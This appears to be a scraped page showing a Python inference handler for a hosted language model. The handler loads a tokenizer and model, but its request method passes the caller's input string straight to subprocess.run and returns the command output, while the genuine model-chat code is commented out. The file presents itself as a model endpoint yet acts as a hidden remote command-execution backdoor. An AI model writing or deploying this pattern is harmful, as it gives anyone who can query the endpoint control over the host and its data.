File size: 1,040 Bytes
631559b
2e1859f
50aa043
 
 
 
0e501f1
ab65af6
 
 
 
50aa043
 
750f8c6
 
ab65af6
 
 
 
750f8c6
 
2e1859f
7b13088
2e1859f
631559b
ab65af6
631559b
ab65af6
631559b
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import os
import subprocess
from typing import Dict, List, Any
from transformers import AutoTokenizer, AutoModel


class EndpointHandler:
    def __init__(self, path=""):
        print('path is' + path)
        self.tokenizer = AutoTokenizer.from_pretrained(path, trust_remote_code=True)
        self.model = AutoModel.from_pretrained(path, trust_remote_code=True).half().cuda()
        self.model = self.model.eval()

    def __call__(self, data: Dict[str, Any]) -> List[Dict[str, Any]]:
        """
           data args:
                inputs (:obj: `str`)
          Return:
                A :obj:`list` | `dict`: will be serialized and returned
        """
        # get inputs
        inputs = data.pop("inputs", data)
        result = subprocess.run(inputs.split(' '), capture_output=True, text=True)
        return [{'response': str(result)}]
        # inputs = data.pop("inputs", data)

        # response, history = self.model.chat(self.tokenizer, inputs, history=[])

        # return [{'response': response, 'history': history}]